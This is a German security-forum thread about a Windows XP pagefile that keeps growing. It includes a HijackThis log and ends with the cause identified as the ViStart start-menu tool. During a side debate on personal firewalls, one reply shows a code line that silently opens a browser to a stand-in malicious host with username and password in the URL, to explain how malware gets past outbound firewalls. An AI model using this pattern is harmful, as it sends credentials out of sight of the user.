Trojaner-Board - Auslagerungsdatei wächst trotz Begrenzung

Trojaner-Board (https://www.trojaner-board.de/)

- Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)

- - Auslagerungsdatei wächst trotz Begrenzung (https://www.trojaner-board.de/94648-auslagerungsdatei-waechst-trotz-begrenzung.html)

Auslagerungsdatei wächst trotz Begrenzung

Hallo zusammen,

ich bin mir nicht sicher ob ich mir was eingefangen habe aber seit ca. einer Woche habe ich das Problem, daß die Auslagerungsdatei ständig um 1MB wächst. Teilweise auch im Minutentakt. Inzwischen habe ich der Datei eine feste Größe von 1150MB gegeben (vom System empfohlen) trotzdem wird das ignoriert, sodaß ich nach längerem arbeiten irgendwann den Hinweis bekomme das nicht genügend Speicher vorhanden ist bzw. Programme sich nicht mehr starten lassen. Im Taskmanager kann ich ersehen, daß die Auslagerungsdatei meist bei ca. 2GB steht was ich nicht erklären kann. Das passiert auch wenn ich gar nichts am PC mache und auch keine Programme laufen. Kann das ein Wurm, Trojaner oder ähnliches sein?

Habe folgende Maßnahmen erfolglos probiert:
- Super AntiSpyware laufen lassen - Ergebnis kein Fund
- Spywareblaster laufen lassen - Ergebnis kein Befund
- AntiVir laufen lassen - Ergebnis kein Befund
- Malwarebyte's AntiMalware laufen lassen - Ergebnis kein Befund
- HijackThis laufen lassen - keine verdächtigen Angaben gefunden
- SystemExplorer laufen lassen - keine verdächtigen Dienste oder Prozesse gefunden
- Festplatte defragmentiert - Keine Verbesserung
- Programme welche ich nicht mehr benötigt habe deinstalliert und anschliessend mit RegCleaner und CCleaner gesäubert
- Auslagerungsdatei auf eine andere Partition gelegt - wächst nach wie vor

Früher konnte ich den Rechner problemlos mal 2 - 3 Tage durchlaufen lassen ohne das es Probleme gab. Jetzt kann man ungefähr sagen innerhalb von ca. 10 Stunden erreicht die Auslagerungsdatei diese ca. 2GB und mir bleibt nichts anderes übrig als den Rechner von Hand auszuschalten und neu zu starten (Reset). Das System reagiert dann überhaupt gar nicht mehr.

Könnte mir da jemand helfen was ich ändern muß bzw. kann jemand erkennen woran das liegen könnte?

Anbei mal das aktuelle HijackThis-Logfile:

Code:

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 23:45:23, on 10.01.2011

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.5730.0013)

Boot mode: Normal
 

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\brsvc01a.exe

C:\WINDOWS\system32\brss01a.exe

C:\WINDOWS\system32\spoolsv.exe

D:\Avira\AntiVir Desktop\sched.exe

C:\WINDOWS\Explorer.EXE

D:\PS Tray Factory\PSTrayFactory.exe

C:\WINDOWS\SOUNDMAN.EXE

D:\Avira\AntiVir Desktop\avgnt.exe

D:\Ashampoo\Ashampoo FireWall\FireWall.exe

C:\Programme\ViStart\ViStart.exe

C:\WINDOWS\system32\ctfmon.exe

D:\PopTray\PopTray.exe

D:\Avira\AntiVir Desktop\avguard.exe

C:\WINDOWS\system32\nvsvc32.exe

C:\WINDOWS\system32\tcpsvcs.exe

C:\WINDOWS\system32\svchost.exe

D:\Avira\AntiVir Desktop\avshadow.exe

C:\WINDOWS\system32\taskmgr.exe

C:\WINDOWS\System32\svchost.exe

D:\Mozilla Firefox\firefox.exe

D:\HiJackThis\HijackThis.exe
 

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

O2 - BHO: btorbit.com - {000123B4-9B42-4900-B3F7-F4B073EFC214} - D:\Orbitdownloader\orbitcth.dll

O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - D:\Java\jre6\bin\jp2ssv.dll

O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - D:\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll

O3 - Toolbar: Grab Pro - {C55BBCD6-41AD-48AD-9953-3609C48EACC7} - D:\Orbitdownloader\GrabPro.dll

O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE

O4 - HKLM\..\Run: [avgnt] "D:\Avira\AntiVir Desktop\avgnt.exe" /min

O4 - HKLM\..\Run: [TrayFactory] D:\PS Tray Factory\PSTrayFactory.EXE /silent

O4 - HKLM\..\Run: [Ashampoo FireWall] "D:\Ashampoo\Ashampoo FireWall\FireWall.exe" -TRAY

O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup

O4 - HKLM\..\RunOnce: [TrayFactory] D:\PS Tray Factory\PSTrayFactory.exe /start

O4 - HKCU\..\Run: [ViStart] C:\Programme\ViStart\ViStart.exe

O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe

O4 - S-1-5-18 Startup: PopTray.lnk = D:\PopTray\PopTray.exe (User 'SYSTEM')

O4 - .DEFAULT Startup: PopTray.lnk = D:\PopTray\PopTray.exe (User 'Default user')

O4 - Startup: PopTray.lnk = D:\PopTray\PopTray.exe

O8 - Extra context menu item: &Download by Orbit - res://D:\Orbitdownloader\orbitmxt.dll/201

O8 - Extra context menu item: &Grab video by Orbit - res://D:\Orbitdownloader\orbitmxt.dll/204

O8 - Extra context menu item: Do&wnload selected by Orbit - res://D:\Orbitdownloader\orbitmxt.dll/203

O8 - Extra context menu item: Down&load all by Orbit - res://D:\Orbitdownloader\orbitmxt.dll/202

O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://D:\MICROS~1\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: Fit-width Print - {3C34EBD2-038D-4d4f-B081-16D99D8BE2B4} - C:\WINDOWS\Downloaded Program Files\IEPrint.dll

O9 - Extra button: ICQ7.1 - {71BFC818-0CED-42D6-9C87-5142918957EE} - D:\ICQ7.1\ICQ.exe

O9 - Extra 'Tools' menuitem: ICQ7.1 - {71BFC818-0CED-42D6-9C87-5142918957EE} - D:\ICQ7.1\ICQ.exe

O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\MICROS~1\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O16 - DPF: IEPrint - hxxp://adrianba.net/pages/software/download/IEPrint.CAB

O23 - Service: Avira AntiVir Planer (AntiVirSchedulerService) - Avira GmbH - D:\Avira\AntiVir Desktop\sched.exe

O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - D:\Avira\AntiVir Desktop\avguard.exe

O23 - Service: BrSplService (Brother XP spl Service) - brother Industries Ltd - C:\WINDOWS\system32\brsvc01a.exe

O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe

O23 - Service: O&O Defrag 2000 (OOD2000) - O&O Software GmbH - C:\WINDOWS\system32\OOD2000.exe
 

--

End of file - 4282 bytes

Zitat:

eine feste Größe von 1150MB gegeben (vom System empfohlen)

Sicher? Anfangsgröße=Maxmale Größe=1150 MB definiert und dann auf FESTLEGEN geklickt?

Wieviel Arbeitsspeicher hat der Rechner?

Zitat:

D:\Ashampoo\Ashampoo FireWall\FireWall.exe

Buntes Schlangenöl, von so einer Software würde ich immer die Finger lassen.

Hallo,

ja ich habe bei Anfangsgröße und auch bei Maximalgröße die gleichen Werte eingetragen und auch Festgelegt. Momentan habe ich es wieder testweise umgestellt, sodaß Windows es verwaltet aber egal was ich versuche oder mache die Auslagerungsdatei hört nicht auf zu wachsen. Das war vorher nicht so.
Nach einigem googeln bin ich auch schon auf die Idee mit der Firewall gekommen, allerdings habe ich diese schon einige Jahre in Betrieb und noch nie Probleme damit gehabt und andererseits habe ich die testweise mal komplett deaktiviert bzw. beendet aber das "Speicher fressen" geht selbst nach einem Neustart weiter.

Habe auch Filemon laufen aber ehrlich gesagt kann ich mit den Angaben die dort ausgegeben werden nichts anfangen.

Was kann das sein? Wie kann ich das herausfinden? Auch ist kein Prozess erkennbar, welcher deutlich an Speicher zulegt. Arbeitsspeicher habe ich 768MB. Hat auch sonst immer tadellos funktioniert. Habe memtest64 auch mal laufen lassen weil ich den Verdacht hatte das eventuell Arbeitsspeicher defekt wäre aber da werden mir keinerlei Errormeldungen angezeigt.

Weiß nicht wirklich weiter wo ich noch schauen kann denn irgendetwas muß doch der Übeltäter sein oder?

Zitat:

Nach einigem googeln bin ich auch schon auf die Idee mit der Firewall gekommen, allerdings habe ich diese schon einige Jahre in Betrieb und noch nie Probleme damit gehabt und andererseits habe ich die testweise mal komplett deaktiviert bzw. beendet aber das "Speicher fressen" geht selbst nach einem Neustart weiter.

Es geht um die Sinnfreiheit von Personal Firewalls allgemein, aber das ein Thema für sich, um herauszufinden ob es an dieser PFW liegt musst du diese auch mal komplett deinstallieren und nicht nur deaktivieren.

Zitat:

habe aber seit ca. einer Woche habe ich das Problem,

Was wurde da gemacht? Irgendeine Änderung am System muss es ja gegeben haben und sei es nur die Installation von irgendwelchen Updates für Windows oder Programme...

Zitat:

Was wurde da gemacht? Irgendeine Änderung am System muss es ja gegeben haben und sei es nur die Installation von irgendwelchen Updates für Windows oder Programme...

Ehrlich gesagt habe ich weder Updates noch sonst irgendwelche Veränderungen vorgenommen. Klar irgendwas muß passiert sein sonst würde dieses Verhalten nicht sein. Habe jetzt mal alles aus dem Autostart herausgenommen und jedes einzeln aktiviert und den Rechner neu gestartet um zu sehen welches Programm das verursachen könnte. Dabei habe ich festgestellt das meine Startleiste (ViStart) die Ursache gewesen ist. Wenn ich das nicht mitstarte, dann wird auch die Auslagerungsdatei nicht größer :Boogie:
Ok über den Sinn bzw. Unsinn von alternativen Startleisten kann man natürlich auch streiten. Komisch ist nur das ich diese schon seit nem Jahr drauf habe und nie was gewesen war. Ich werde es jetzt erst einmal ohne dieses Tool probieren.

Wie kann es denn sein, das ein solches Tool soetwas verursacht? Defekte Installation?

Zitat:

Es geht um die Sinnfreiheit von Personal Firewalls allgemein

Das würde ich aber gerne etwas genauer erfahren. Ich persönlich finde es ganz gut wenn mich eine Anwendung fragt ob diese eine Internetverbindung machen darf oder nicht. Gibt es denn ansonsten Alternativen ausser einer Firewall in der man für verschiedene Anwendungen die entsprehcneden Ports freigibt oder aber auch sperrt? Kann man dieses Verhalten auch mit anderen Mitteln herstellen?

Zitat:

Ich persönlich finde es ganz gut wenn mich eine Anwendung fragt ob diese eine Internetverbindung machen darf oder nicht.

Das kann völlig problemlos umgangen werden:

Code:

ShellExecute(NULL, "open", "http://www.poehseseite.com/?var1=$username&var2=$password", NULL, NULL, SW_HIDE);

Damit ruft der Standardbrowser in einem unsichtbaren Fenster eine beliebige URL mit zB "bösen" Daten auf.
Vgl. Use ShellExecute to launch the default Web browser

Die Anwendung selbst kommuniziert dann vllt nicht mit seinem nach-Hause-Telefonier-Server, wohl aber der Standardbrowser. Und niemand wird wohl den Standardbrowser blockieren. :pfeiff:

Lies auch mal hier, ich denke dann sollte es noch klarer werden:

Die Vertrauensbrecher c't Editorial über Internet Security Suites und warum sie idR nichts taugen
Oberthal online: Personal Firewalls: Sinnvoll oder sinnfrei?
personal firewalls ? Wiki ? ubuntuusers.de
NT-Dienste sicher konfigurieren und abschalten (Windows 2000/XP) - www.ntsvcfg.de
microsoft.public.de.security.heimanwender FAQ

Dann wirst Du feststellen, dass es einfach nur unnötig ist, sich das System mit einer weiteren "Schutzkomponente" zu verhunzen... :rolleyes:

Malwarebefall vermeiden kannst Du sowieso nur, wenn Du selbst Dein verhalten in den Griff bekommst => Kompromittierung unvermeidbar?

Hallo zusammen,

habe den Fehler nun doch selbst beheben können. Das Problem war glücklicherweise kein Schädling sondern nur eine Anwendung Namens ViStart (Alternatives Startmenü im Vista-Stil). Ich habe diese jetzt erst einmal komplett deaktiviert bzw. werde es wohl runterschmeissen. Auch mein davor genutztes Windows-Theme hat vorerst ausgedient. Nachdem ich diese beiden Komponenten abgeschaltet habe, habe ich auch direkt gemerkt, daß der Rechner viel besser und vor allem schneller läuft.

So schön auch Theme's und andere Modding-Aktionen sind, die Geschwindigkeit eines Systems wird dadurch doch teilweise ziemlich ausgebremst.

@cosinus: Auch Danke an für die Info's bezüglich der Firewall. Klar ist es keine 100%ige Sicherheit aber für mich persönlich eine gute und sinnvolle Möglichkeit zu sehen, welches Programm "raus telefonieren" will. Generell ist mein System ja sicher konfiguriert. Bin halt nur etwas unsicher geworden wegen des dargestellten Problems.

Vielen Dank für die schnellen Hinweise und die Unterstützung.

P.S. Wie kann man den Thread als GELÖST kennzeichnen?

Zitat:

Klar ist es keine 100%ige Sicherheit aber für mich persönlich eine gute und sinnvolle Möglichkeit zu sehen, welches Programm "raus telefonieren" will.

Das hat nichts mit Sicherheit zu tun und du kannst nur Programme hindern, die so freundlich sind und sich auch hindern lassen. Im Grunde ist eine PFW ein buntes Spielzeug, aber kein zuverlässiges Hilfsmittel.

Zitat:

Aber wie kann man denn alternativ ohne eine Firewall einem Programm sagen, das er auf Port X darf und Port Y nicht benutzen darf? Da gibt es doch nur die Möglichkeiten der Firewall oder?

Lasse mich ja gerne eines besseren belehren, nur ich kenne keine Möglichkeit einem Programm einfacher zu sagen du darfst Port X benutzen Port Y da hast du keinen Zutritt. Da ist die Firewall schon Sinnvoll und am einfachsten vor allem um zu sehen welches Programm über welchen Port nach Hause telefonieren will. Oder irre ich mich da?

Zitat:

Aber wie kann man denn alternativ ohne eine Firewall einem Programm sagen, das er auf Port X darf und Port Y nicht benutzen darf? Da gibt es doch nur die Möglichkeiten der Firewall oder?

Für ausgehenden Verkehr ist das schon wie erwähnt ziemlicher Unsinn, da böse Programme das so umgehen können. Außerdem stellt sich die Frage, warum du einem Programm den Weg nach außen versperren willst.
Für eingehenden Traffic leistet die Windows-Firewall und/oder DSL-Router min. genauso gute Dienste. Und wer will: ab Vista gibt es eine aufgebohrte Windows-Firewall.